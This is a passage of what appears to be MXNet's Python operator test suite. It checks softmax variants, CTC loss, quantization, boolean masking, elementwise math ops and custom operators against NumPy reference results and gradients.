check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_device(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def np_softmax(x, axis=-1, temperature=1.0, normalize=True):
if normalize:
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x / temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def np_masked_softmax(data, mask, axis=-1, temperature=1.0, normalize=True):
neg = -1e18
if data.dtype == np.float16:
neg = -1e4
temp = np.where(mask, data, neg)
result = np_softmax(temp, axis=axis,
temperature=temperature,
normalize=normalize) * mask
return result
def np_masked_softmax_grad(out, grad_out, axis=-1, temperature=1.0):
temp = np.sum(out * grad_out, axis=axis, keepdims=True)
result = out * (grad_out - temp) / temperature
return result
def np_masked_log_softmax_grad(out, grad_out, mask, axis=-1, temperature=1.0):
grad_out = np.where(mask, grad_out, 0)
temp = np.sum(grad_out, axis=axis, keepdims=True)
result = (grad_out - np.exp(out) * temp) / temperature
result = np.where(mask, result, 0)
return result
@pytest.mark.parametrize('dtype', [np.float16, np.float32, np.float64])
@pytest.mark.parametrize('axis', [0, -1, -2, -3])
@pytest.mark.parametrize('ndims', [3, 4, 5])
@pytest.mark.parametrize('n_broadcast_axis', [0, 1, 2])
@pytest.mark.parametrize('temperature', [1, 5, 9 ,11])
@pytest.mark.parametrize('normalize', [True])
@pytest.mark.flaky
def test_masked_softmax(dtype, axis, ndims, n_broadcast_axis, temperature, normalize):
n_broadcast_axis = min(n_broadcast_axis, ndims - 1)
shape = rand_shape_nd(ndims, dim=10)
mx_data = rand_ndarray(shape, dtype=dtype)
bcst_dims = []
while len(bcst_dims) < n_broadcast_axis:
ax = np.random.randint(0, ndims)
if ax not in bcst_dims :
bcst_dims.append(ax)
shape_mask = list(shape)
for i in bcst_dims:
shape_mask[i] = 1
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape_mask)
mx_mask = mx.nd.array(np_mask, dtype=np.bool)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np_masked_softmax(np_data, np_mask, axis,
temperature, normalize)
np_grad_out = np_masked_softmax_grad(np_out, np_grad,
axis, temperature)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_softmax(data=data, mask=mask,
temperature=temperature, axis=axis,
normalize=normalize)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol,
dtype="asnumpy", equal_nan=True)
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
@pytest.mark.parametrize('dtype', ['float32'])
@pytest.mark.parametrize('ndims', [1, 2, 3, 4, 5])
def test_masked_log_softmax(dtype, ndims):
shape = np.random.randint(1, 5, size=ndims)
axis = np.random.randint(0, ndims)
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape)
mx_mask = mx.nd.array(np_mask, dtype=np.bool)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np.log(np_masked_softmax(np_data, np_mask, axis)+1e-20) * np_mask
np_out_inf = np.where(np_mask, np_out, -np.inf)
np_grad_out = np_masked_log_softmax_grad(np_out, np_grad, np_mask, axis)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_log_softmax(data=data, mask=mask, axis=axis-ndims)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out_inf], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_device())
labels_nd = mx.nd.array(labels, ctx=default_device())
exe = ctc._bind(ctx=default_device(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_device()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_device():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
prev_np_shape = mx.set_np_shape(True)
try:
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
finally:
mx.set_np_shape(prev_np_shape)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail check_numeric_gradient tol test
# due to finite difference method inaccuracies or function discontuities at the origin
def bad_input_finder(f, f_grad, dtype):
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
